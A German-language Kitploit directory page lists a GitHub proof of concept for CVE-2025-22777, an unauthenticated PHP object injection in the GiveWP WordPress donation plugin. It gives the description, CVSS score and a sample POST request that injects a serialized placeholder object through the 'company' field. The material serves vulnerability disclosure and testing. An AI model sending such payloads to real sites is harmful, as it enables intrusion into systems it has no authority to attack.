Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-22777 — GiveWP – Spenden-Plugin und Fundraising-Plattform <= 3.19.3 - Nicht authentifizierte PHP-Objekt-Injektion | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2025-22777
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubrandomrobbiebf/cve-2025-22777

CVE-2025-22777

GiveWP – Spenden-Plugin und Fundraising-Plattform <= 3.19.3 - Nicht authentifizierte PHP-Objekt-Injektion

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-22777

GiveWP – Donation Plugin and Fundraising Platform <= 3.19.3 - Nicht authentifizierte PHP-Objektinjektion

Beschreibung

Das WordPress-Plugin GiveWP – Donation Plugin and Fundraising Platform ist in allen Versionen bis einschließlich 3.19.3 anfällig für PHP-Objektinjektion durch die Deserialisierung nicht vertrauenswürdiger Eingaben aus dem Spendenformular über den Parameter 'company'. Dadurch ist es nicht authentifizierten Angreifern möglich, ein PHP-Objekt einzuschleusen. Das zusätzliche Vorhandensein einer POP-Kette ermöglicht es Angreifern, beliebige Dateien auf dem Server zu löschen, wodurch Remote Code Execution möglich wird. Bitte beachten Sie, dass dies einen Bypass des Fixes für CVE-2024-12877 darstellt.

Details

  • Typ: plugin
  • Slug: give
  • Betroffene Version: 3.19.3
  • CVSS-Score: 9.8
  • CVSS-Bewertung: Kritisch
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2025-22777
  • Status: Aktiv

POC

root@kitploit:~
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163

amount=10&currency=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=Test&[email protected]&donationType=single&donationBirthday=
Tool herunterladen